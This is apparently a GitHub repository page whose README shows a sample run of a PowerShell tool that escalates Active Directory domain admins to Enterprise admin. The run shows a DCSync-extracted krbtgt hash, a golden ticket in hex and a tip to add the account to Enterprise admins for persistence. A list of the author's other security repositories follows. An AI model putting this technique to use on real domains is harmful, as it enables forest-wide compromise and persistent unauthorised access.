• Stars
    star
    251
  • Rank 161,862 (Top 4 %)
  • Language
    PowerShell
  • License
    MIT License
  • Created over 8 years ago
  • Updated over 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Example of successful execution:

======================================================================
  /\     Elevated domain admins to Enterprise admins     - version 1.0
  ||
 /||\    Require: domain admin right 
|:||:|             or more specifically DS-Replication-Get-Changes-All
|/||\|   Vincent LE TOUX ([email protected])
======================================================================

This will execute:
 - dcsync to extract the krbtgt password
 - build a golden ticket 
 - import it

Once succeed, you will have to add the account in the Enterprise admin group for persistence

======================================================================
krbtgt hash
291EF75550A20FE901F81B124B4E4DD4
golden ticket
76840000059D308400000597A08400000003020105A18400000003020116A2840000041930840000041361840000040D308400000407A08400000003020105A184000000171B15746573742E6D79736D6172746C6F676F6E2E636F6DA2840000003A308400000034A08400000003020102A1840000002530840000001F1B066B7
2627467741B15746573742E6D79736D6172746C6F676F6E2E636F6DA3840000039B308400000395A08400000003020117A18400000003020102A2840000037D048203794BE30E2DC2959826599DCD56A156836ED24CA3B70F642B567A609C45D6AB11583626B6BDE2F6FFC23DCB67805B467C08F00315E1F1DEE8F26FD595E314
F9566CE4C3C4F8D75561791073FB3B768E1B748FDCF76CC5F5FA80CED882DEB5CFE4E14525E2265EF11A7DB198E4DD140762BBD4CDD334FD443CC8AFE8A92AF54B494FA0C861E3219048E5808E3D151EB11BB83EBE64EEA2EC4CBD2C1A97D8D4A238E69DA4B5E31E8A5ECA389748EE133329E9E28BE786C4C8A0531F61FDB0A6F
07751102D09524F298FBE1EACA7F1EF5B0CD93CF00EBF49FE0C44A8E1171CD85CCB8E18EDD8EE1C2F87C00E29F0D7B62432734EDE68DF98A772CCDFFAFAF40D69E16B1965D70E32BA834502C723F3B4A5395477BE619A837F911A489E404378AC7B05632FB8444B949A29FB07DAC65DAB06E01C1E6A83CF1850A85779F4010742
B586D1D06918E96F7E92F8076B84DE7387591A63E77C5097ABA8FD8B9341EC44CED24519DE08440056489A6D145D3910DB49668F8302E82FD57B31894EB4E497CA7DA7D86E7F4F0705A674199D6A8423B9D6A14F018E1603958D2467BE90AB52B7C3735FBEF7A534FB56FB13F22BF2EABF4A563CF157AE8E07D1FAFE1F248340F
1664D1B815D9BB78328DC71D159382DE6BFB6A4FB604989775FEDAE488CED6BC5C4682B9D5C3E9A051FF49D1E5B18E48A8AB136B562A514A657C1CFD9487C82B88827CF88E5E54DD9F09204A9A78A504CAC09046D38DED340930B03B923CD5C51008F583BBC1412CD17B3AEA0344BF314D53CDF1FC452CB6879A18642FCBEAA90
293AF7F09D74DDFCE8239D97C4DA61141BA71CB0BCC8390977221F204B9C1517E691A8BC77FB8C518E7C9D5F1BB43EA65048A6065C1641A82EA799F5AF4E6A10BE05638F9615BA36C063F1BA61A192E5A31C5343E7B1DD032C53A0B7589843AF908EEC3B8D12186DEAD1B199DF1EBA8A9A65970C5083BF21D21D9F78F3B519697
3D9BD3990E79FABE85669CC9E5B5ACE36AB5ABE7713778D83B5284C376DAE0779914F92AFE71C7965773B765AE9AC68B5BEFD4AEC3312AB14AF3435294C95D252ADBD308CC59AE05938B089CBCB3E66F874501B8EC526D0FEB0B7362B4D802D0E0FBB70291B086E875C9BB74C7155027607BAC843FCE981D72BF1B12A1BD9A350
3BA82D506F7A93C179200AE50B5A42BCFA5A18E2704250047498364FB8E7AF50AF4D2D0725425721743C3F5F2F49A699BDD31B3D02A6FA9266A3840000016030840000015AA08400000003020100A2840000014B048201477D840000014130840000013BA0840000013530840000012F308400000129A08400000027308400000
021A08400000003020117A184000000120410ED609578C65E0358BB3C5F231A8A14FCA184000000171B15746573742E6D79736D6172746C6F676F6E2E636F6DA2840000002A308400000024A08400000003020101A1840000001530840000000F1B0D41646D696E6973747261746F72A3840000000703050040E00000A5840000
0011180F32303136303832363136323733395AA68400000011180F32303236303832363136323733395AA78400000011180F32303236303832363136323733395AA884000000171B15746573742E6D79736D6172746C6F676F6E2E636F6DA9840000003A308400000034A08400000003020102A1840000002530840000001F1B0
66B72627467741B15746573742E6D79736D6172746C6F676F6E2E636F6D
Ticket imported
======================================================================
You got promoted Enterprise admin (when connecting to other computers)
Have a nice day
...

For solutions, do not forget to check [PingCastle] (https://www.pingcastle.com)

More Repositories

1

pingcastle

PingCastle - Get Active Directory Security at 80% in 20% of the time
C#
2,140
star
2

SpoolerScanner

Check if MS-RPRN is remotely available with powershell/c#
PowerShell
173
star
3

NTLMInjector

In case you didn't now how to restore the user password after a password reset (get the previous hash with DCSync)
PowerShell
162
star
4

PingCastleCloud

Audit program for AzureAD
C#
144
star
5

SmbScanner

Smb Scanner from PingCastle
PowerShell
118
star
6

GidsApplet

Generic Identity Device Specification Applet
Java
101
star
7

ms17-010-Scanner

PowerShell
59
star
8

DetectPasswordViaNTLMInFlow

Extract the password of the current user from flow (keylogger, config file, ..) Use SSPI to get a valid NTLM challenge/response and test passwords
C++
57
star
9

TestAntivirus

Test if an antivirus is installed via the resolution of the service virtual SID
PowerShell
54
star
10

Bluekeep-scanner

BlueKeep powershell scanner (based on c# code)
PowerShell
40
star
11

OpenPGP-CSP

A CSP for the OpenPGP card - goal: add write support for certificate enrollment
C++
37
star
12

RPCForSMBLibrary

Extension of SMBLibrary for RPC calls
C#
33
star
13

OxidBindings

Extract all IP of a computer using DCOM without authentication (aka detect network used for administration)
PowerShell
24
star
14

ADSecrets

Set of ultra technical notes about AD
C#
18
star
15

openpgpmdrv

OpenPGP smart card minidriver
C
10
star
16

SubAuth

Sub Authentication package (for the talk you "try" to detect mimikatz)
C++
5
star
17

Cyrating2TH

Cyrating Reputation alert importer for TheHive, an Open Source and Free Security Incident Response Platform
Python
5
star
18

PingCastlePatrOwl

An Engine for PatrOwl allowing to run PingCastle scans
C#
4
star
19

PINSniff

capture smart card pin via a filter driver (demo of you "try" to detect mimikatz)
C
3
star
20

PingCastlePowerBIConnector

PowerBI Connector for PingCastle Enterprise
2
star
21

conferences

1
star
22

ExploitIncomingForestTrustBuilder

C++
1
star